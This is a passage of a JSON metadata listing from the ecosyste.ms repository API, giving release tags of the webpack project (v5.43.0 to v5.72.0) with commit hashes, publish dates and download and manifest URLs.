ste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.